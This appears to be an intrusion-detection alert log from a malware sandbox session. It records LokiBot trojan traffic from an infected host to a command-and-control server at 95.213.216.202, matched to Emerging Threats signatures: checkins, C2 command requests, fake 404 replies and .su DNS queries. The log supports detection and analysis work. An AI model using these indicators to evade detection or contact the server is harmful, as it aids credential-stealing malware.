192.168.2.695.213.216.20249711802024313 11/24/22-19:54:38.624655	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49711	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249705802021641 11/24/22-19:54:27.228813	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49705	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249719802025381 11/24/22-19:54:53.033944	TCP	2025381	ET TROJAN LokiBot Checkin	49719	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249729802825766 11/24/22-19:55:13.852615	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49729	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249722802025381 11/24/22-19:54:59.769485	TCP	2025381	ET TROJAN LokiBot Checkin	49722	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249747802825766 11/24/22-19:55:51.131718	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49747	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249711802024318 11/24/22-19:54:38.624655	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49711	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249740802025381 11/24/22-19:55:37.776321	TCP	2025381	ET TROJAN LokiBot Checkin	49740	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249750802025381 11/24/22-19:55:57.329298	TCP	2025381	ET TROJAN LokiBot Checkin	49750	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249737802825766 11/24/22-19:55:31.199874	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49737	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249714802825766 11/24/22-19:54:45.091814	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49714	80	192.168.2.6	95.213.216.202
192.168.2.68.8.8.850343532014169 11/24/22-19:55:13.761219	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	50343	53	192.168.2.6	8.8.8.8
192.168.2.695.213.216.20249741802021641 11/24/22-19:55:39.990050	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49741	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249709802025381 11/24/22-19:54:33.518227	TCP	2025381	ET TROJAN LokiBot Checkin	49709	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249723802021641 11/24/22-19:55:01.692450	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49723	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249727802025381 11/24/22-19:55:09.788187	TCP	2025381	ET TROJAN LokiBot Checkin	49727	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249700802021641 11/24/22-19:54:18.249997	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49700	80	192.168.2.6	95.213.216.202
192.168.2.68.8.8.856569532014169 11/24/22-19:55:23.105213	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	56569	53	192.168.2.6	8.8.8.8
192.168.2.695.213.216.20249719802825766 11/24/22-19:54:53.033944	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49719	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249732802825766 11/24/22-19:55:21.169470	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49732	80	192.168.2.6	95.213.216.202
192.168.2.68.8.8.853943532014169 11/24/22-19:55:03.645658	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	53943	53	192.168.2.6	8.8.8.8
192.168.2.695.213.216.20249755802025381 11/24/22-19:56:06.881877	TCP	2025381	ET TROJAN LokiBot Checkin	49755	80	192.168.2.6	95.213.216.202
192.168.2.68.8.8.855629532014169 11/24/22-19:55:19.049102	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	55629	53	192.168.2.6	8.8.8.8
95.213.216.202192.168.2.680497312025483 11/24/22-19:55:20.867899	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49731	95.213.216.202	192.168.2.6
192.168.2.695.213.216.20249755802825766 11/24/22-19:56:06.881877	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49755	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249701802024313 11/24/22-19:54:22.087876	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49701	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249732802025381 11/24/22-19:55:21.169470	TCP	2025381	ET TROJAN LokiBot Checkin	49732	80	192.168.2.6	95.213.216.202
192.168.2.68.8.8.860130532014169 11/24/22-19:55:57.225226	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	60130	53	192.168.2.6	8.8.8.8
192.168.2.695.213.216.20249718802024313 11/24/22-19:54:50.807735	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49718	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249701802024318 11/24/22-19:54:22.087876	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49701	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249699802024318 11/24/22-19:54:15.956073	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49699	80	192.168.2.6	95.213.216.202
95.213.216.202192.168.2.680497402025483 11/24/22-19:55:39.709470	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49740	95.213.216.202	192.168.2.6
95.213.216.202192.168.2.680497422025483 11/24/22-19:55:42.590814	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49742	95.213.216.202	192.168.2.6
192.168.2.695.213.216.20249718802024318 11/24/22-19:54:50.807735	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49718	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249699802024313 11/24/22-19:54:15.956073	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49699	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249702802025381 11/24/22-19:54:25.054966	TCP	2025381	ET TROJAN LokiBot Checkin	49702	80	192.168.2.6	95.213.216.202
192.168.2.68.8.8.861609532014169 11/24/22-19:54:59.613442	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	61609	53	192.168.2.6	8.8.8.8
95.213.216.202192.168.2.680497282025483 11/24/22-19:55:13.560423	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49728	95.213.216.202	192.168.2.6
192.168.2.695.213.216.20249710802021641 11/24/22-19:54:35.914327	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49710	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249716802024318 11/24/22-19:54:48.704817	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49716	80	192.168.2.6	95.213.216.202
192.168.2.68.8.8.862958532014169 11/24/22-19:55:40.875534	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	62958	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.864382532014169 11/24/22-19:54:15.835585	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	64382	53	192.168.2.6	8.8.8.8
192.168.2.695.213.216.20249716802024313 11/24/22-19:54:48.704817	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49716	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249707802021641 11/24/22-19:54:31.276699	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49707	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249739802825766 11/24/22-19:55:35.259290	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49739	80	192.168.2.6	95.213.216.202
95.213.216.202192.168.2.680497242025483 11/24/22-19:55:05.403255	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49724	95.213.216.202	192.168.2.6
192.168.2.68.8.8.849232532014169 11/24/22-19:55:31.114753	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	49232	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.862848532014169 11/24/22-19:55:44.925533	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	62848	53	192.168.2.6	8.8.8.8
192.168.2.695.213.216.20249713802021641 11/24/22-19:54:43.021097	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49713	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249745802825766 11/24/22-19:55:47.082758	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49745	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249731802024318 11/24/22-19:55:19.158567	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49731	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249706802825766 11/24/22-19:54:29.062049	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49706	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249749802024313 11/24/22-19:55:55.139215	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49749	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249709802825766 11/24/22-19:54:33.518227	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49709	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249731802024313 11/24/22-19:55:19.158567	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49731	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249746802024313 11/24/22-19:55:49.078874	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49746	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249742802825766 11/24/22-19:55:40.973542	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49742	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249749802024318 11/24/22-19:55:55.139215	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49749	80	192.168.2.6	95.213.216.202
95.213.216.202192.168.2.680497072025483 11/24/22-19:54:33.040572	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49707	95.213.216.202	192.168.2.6
192.168.2.695.213.216.20249712802825766 11/24/22-19:54:40.926341	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49712	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249752802024313 11/24/22-19:56:01.434635	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49752	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249746802024318 11/24/22-19:55:49.078874	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49746	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249752802024318 11/24/22-19:56:01.434635	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49752	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249728802021641 11/24/22-19:55:11.780324	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49728	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249743802021641 11/24/22-19:55:42.875605	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49743	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249738802024313 11/24/22-19:55:33.192742	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49738	80	192.168.2.6	95.213.216.202
192.168.2.68.8.8.862910532014169 11/24/22-19:54:44.985895	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	62910	53	192.168.2.6	8.8.8.8
192.168.2.695.213.216.20249724802025381 11/24/22-19:55:03.741584	TCP	2025381	ET TROJAN LokiBot Checkin	49724	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249738802024318 11/24/22-19:55:33.192742	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49738	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249740802825766 11/24/22-19:55:37.776321	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49740	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249744802024313 11/24/22-19:55:45.028740	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49744	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249697802825766 11/24/22-19:54:11.348011	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49697	80	192.168.2.6	95.213.216.202
192.168.2.68.8.8.856331532014169 11/24/22-19:54:31.195563	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	56331	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.849448532014169 11/24/22-19:54:35.800639	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	49448	53	192.168.2.6	8.8.8.8
192.168.2.695.213.216.20249744802024318 11/24/22-19:55:45.028740	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49744	80	192.168.2.6	95.213.216.202
192.168.2.68.8.8.856750532014169 11/24/22-19:56:03.361289	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	56750	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.850506532014169 11/24/22-19:54:33.429766	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	50506	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.859752532014169 11/24/22-19:55:35.135406	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	59752	53	192.168.2.6	8.8.8.8
192.168.2.695.213.216.20249721802021641 11/24/22-19:54:56.896268	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49721	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249729802025381 11/24/22-19:55:13.852615	TCP	2025381	ET TROJAN LokiBot Checkin	49729	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249698802025381 11/24/22-19:54:13.981663	TCP	2025381	ET TROJAN LokiBot Checkin	49698	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249730802025381 11/24/22-19:55:16.067382	TCP	2025381	ET TROJAN LokiBot Checkin	49730	80	192.168.2.6	95.213.216.202
192.168.2.68.8.8.862732532014169 11/24/22-19:55:59.286288	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	62732	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.859336532014169 11/24/22-19:56:04.733170	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	59336	53	192.168.2.6	8.8.8.8
192.168.2.695.213.216.20249734802825766 11/24/22-19:55:25.189583	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49734	80	192.168.2.6	95.213.216.202
192.168.2.68.8.8.865198532014169 11/24/22-19:54:42.928676	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	65198	53	192.168.2.6	8.8.8.8
192.168.2.695.213.216.20249735802025381 11/24/22-19:55:27.170416	TCP	2025381	ET TROJAN LokiBot Checkin	49735	80	192.168.2.6	95.213.216.202
95.213.216.202192.168.2.680497542025483 11/24/22-19:56:06.628427	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49754	95.213.216.202	192.168.2.6
192.168.2.695.213.216.20249715802021641 11/24/22-19:54:47.405096	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49715	80	192.168.2.6	95.213.216.202
95.213.216.202192.168.2.680497192025483 11/24/22-19:54:54.654090	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49719	95.213.216.202	192.168.2.6
95.213.216.202192.168.2.680497522025483 11/24/22-19:56:03.175717	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49752	95.213.216.202	192.168.2.6
192.168.2.695.213.216.20249753802825766 11/24/22-19:56:03.443038	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49753	80	192.168.2.6	95.213.216.202
192.168.2.68.8.8.851321532014169 11/24/22-19:55:51.025349	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	51321	53	192.168.2.6	8.8.8.8
192.168.2.695.213.216.20249697802025381 11/24/22-19:54:11.348011	TCP	2025381	ET TROJAN LokiBot Checkin	49697	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249707802825766 11/24/22-19:54:31.276699	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49707	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249744802825766 11/24/22-19:55:45.028740	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49744	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249749802025381 11/24/22-19:55:55.139215	TCP	2025381	ET TROJAN LokiBot Checkin	49749	80	192.168.2.6	95.213.216.202
95.213.216.202192.168.2.680497162025483 11/24/22-19:54:50.512832	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49716	95.213.216.202	192.168.2.6
95.213.216.202192.168.2.680497142025483 11/24/22-19:54:46.656019	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49714	95.213.216.202	192.168.2.6
192.168.2.695.213.216.20249754802021641 11/24/22-19:56:04.818902	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49754	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249705802024318 11/24/22-19:54:27.228813	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49705	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249710802025381 11/24/22-19:54:35.914327	TCP	2025381	ET TROJAN LokiBot Checkin	49710	80	192.168.2.6	95.213.216.202
95.213.216.202192.168.2.680497112025483 11/24/22-19:54:39.580169	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49711	95.213.216.202	192.168.2.6
95.213.216.202192.168.2.680497132025483 11/24/22-19:54:44.610304	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49713	95.213.216.202	192.168.2.6
192.168.2.695.213.216.20249735802825766 11/24/22-19:55:27.170416	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49735	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249752802025381 11/24/22-19:56:01.434635	TCP	2025381	ET TROJAN LokiBot Checkin	49752	80	192.168.2.6	95.213.216.202
192.168.2.68.8.8.862766532014169 11/24/22-19:55:55.046216	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	62766	53	192.168.2.6	8.8.8.8
192.168.2.695.213.216.20249705802024313 11/24/22-19:54:27.228813	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49705	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249710802825766 11/24/22-19:54:35.914327	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49710	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249707802025381 11/24/22-19:54:31.276699	TCP	2025381	ET TROJAN LokiBot Checkin	49707	80	192.168.2.6	95.213.216.202
192.168.2.68.8.8.864601532014169 11/24/22-19:54:24.912578	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	64601	53	192.168.2.6	8.8.8.8
192.168.2.695.213.216.20249706802024313 11/24/22-19:54:29.062049	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49706	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249735802021641 11/24/22-19:55:27.170416	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49735	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249706802024318 11/24/22-19:54:29.062049	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49706	80	192.168.2.6	95.213.216.202
192.168.2.68.8.8.852481532014169 11/24/22-19:55:01.607307	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	52481	53	192.168.2.6	8.8.8.8
192.168.2.695.213.216.20249726802825766 11/24/22-19:55:07.738200	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49726	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249754802825766 11/24/22-19:56:04.818902	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49754	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249733802025381 11/24/22-19:55:23.201569	TCP	2025381	ET TROJAN LokiBot Checkin	49733	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249753802021641 11/24/22-19:56:03.443038	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49753	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249724802024313 11/24/22-19:55:03.741584	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49724	80	192.168.2.6	95.213.216.202
192.168.2.68.8.8.864404532014169 11/24/22-19:55:42.774058	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	64404	53	192.168.2.6	8.8.8.8
192.168.2.695.213.216.20249726802025381 11/24/22-19:55:07.738200	TCP	2025381	ET TROJAN LokiBot Checkin	49726	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249747802024318 11/24/22-19:55:51.131718	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49747	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249725802825766 11/24/22-19:55:05.694279	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49725	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249712802021641 11/24/22-19:54:40.926341	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49712	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249747802024313 11/24/22-19:55:51.131718	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49747	80	192.168.2.6	95.213.216.202
192.168.2.68.8.8.852865532014169 11/24/22-19:55:37.629169	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	52865	53	192.168.2.6	8.8.8.8
95.213.216.202192.168.2.680497462025483 11/24/22-19:55:50.859980	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49746	95.213.216.202	192.168.2.6
192.168.2.695.213.216.20249699802021641 11/24/22-19:54:15.956073	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49699	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249724802024318 11/24/22-19:55:03.741584	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49724	80	192.168.2.6	95.213.216.202
95.213.216.202192.168.2.680497552025483 11/24/22-19:56:08.689068	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49755	95.213.216.202	192.168.2.6
192.168.2.695.213.216.20249719802021641 11/24/22-19:54:53.033944	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49719	80	192.168.2.6	95.213.216.202
95.213.216.202192.168.2.680497442025483 11/24/22-19:55:46.796463	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49744	95.213.216.202	192.168.2.6
95.213.216.202192.168.2.680497272025483 11/24/22-19:55:11.470809	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49727	95.213.216.202	192.168.2.6
192.168.2.68.8.8.863863532014169 11/24/22-19:54:46.995919	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	63863	53	192.168.2.6	8.8.8.8
192.168.2.695.213.216.20249716802021641 11/24/22-19:54:48.704817	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49716	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249751802025381 11/24/22-19:55:59.376338	TCP	2025381	ET TROJAN LokiBot Checkin	49751	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249714802025381 11/24/22-19:54:45.091814	TCP	2025381	ET TROJAN LokiBot Checkin	49714	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249722802021641 11/24/22-19:54:59.769485	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49722	80	192.168.2.6	95.213.216.202
95.213.216.202192.168.2.680497222025483 11/24/22-19:55:01.407205	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49722	95.213.216.202	192.168.2.6
192.168.2.695.213.216.20249720802025381 11/24/22-19:54:54.960633	TCP	2025381	ET TROJAN LokiBot Checkin	49720	80	192.168.2.6	95.213.216.202
192.168.2.68.8.8.853203532014169 11/24/22-19:54:18.123294	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	53203	53	192.168.2.6	8.8.8.8
192.168.2.695.213.216.20249700802825766 11/24/22-19:54:18.249997	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49700	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249737802024318 11/24/22-19:55:31.199874	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49737	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249740802024313 11/24/22-19:55:37.776321	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49740	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249742802025381 11/24/22-19:55:40.973542	TCP	2025381	ET TROJAN LokiBot Checkin	49742	80	192.168.2.6	95.213.216.202
95.213.216.202192.168.2.680497052025483 11/24/22-19:54:28.634655	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49705	95.213.216.202	192.168.2.6
192.168.2.695.213.216.20249731802021641 11/24/22-19:55:19.158567	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49731	80	192.168.2.6	95.213.216.202
192.168.2.68.8.8.857686532014169 11/24/22-19:54:13.553924	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	57686	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.858595532014169 11/24/22-19:54:28.961973	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	58595	53	192.168.2.6	8.8.8.8
192.168.2.695.213.216.20249736802025381 11/24/22-19:55:29.163584	TCP	2025381	ET TROJAN LokiBot Checkin	49736	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249745802025381 11/24/22-19:55:47.082758	TCP	2025381	ET TROJAN LokiBot Checkin	49745	80	192.168.2.6	95.213.216.202
192.168.2.68.8.8.857515532014169 11/24/22-19:55:48.986225	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	57515	53	192.168.2.6	8.8.8.8
192.168.2.695.213.216.20249734802024318 11/24/22-19:55:25.189583	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49734	80	192.168.2.6	95.213.216.202
95.213.216.202192.168.2.680497002025483 11/24/22-19:54:20.029122	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49700	95.213.216.202	192.168.2.6
192.168.2.695.213.216.20249725802021641 11/24/22-19:55:05.694279	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49725	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249734802024313 11/24/22-19:55:25.189583	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49734	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249743802024318 11/24/22-19:55:42.875605	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49743	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249728802024318 11/24/22-19:55:11.780324	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49728	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249737802024313 11/24/22-19:55:31.199874	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49737	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249728802024313 11/24/22-19:55:11.780324	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49728	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249739802025381 11/24/22-19:55:35.259290	TCP	2025381	ET TROJAN LokiBot Checkin	49739	80	192.168.2.6	95.213.216.202
192.168.2.68.8.8.855956532014169 11/24/22-19:55:46.990731	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	55956	53	192.168.2.6	8.8.8.8
192.168.2.695.213.216.20249743802024313 11/24/22-19:55:42.875605	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49743	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249709802024313 11/24/22-19:54:33.518227	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49709	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249738802021641 11/24/22-19:55:33.192742	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49738	80	192.168.2.6	95.213.216.202
192.168.2.68.8.8.859082532014169 11/24/22-19:54:38.013432	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	59082	53	192.168.2.6	8.8.8.8
192.168.2.695.213.216.20249740802024318 11/24/22-19:55:37.776321	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49740	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249722802825766 11/24/22-19:54:59.769485	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49722	80	192.168.2.6	95.213.216.202
192.168.2.68.8.8.851530532014169 11/24/22-19:54:52.685795	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	51530	53	192.168.2.6	8.8.8.8
192.168.2.695.213.216.20249701802025381 11/24/22-19:54:22.087876	TCP	2025381	ET TROJAN LokiBot Checkin	49701	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249723802025381 11/24/22-19:55:01.692450	TCP	2025381	ET TROJAN LokiBot Checkin	49723	80	192.168.2.6	95.213.216.202
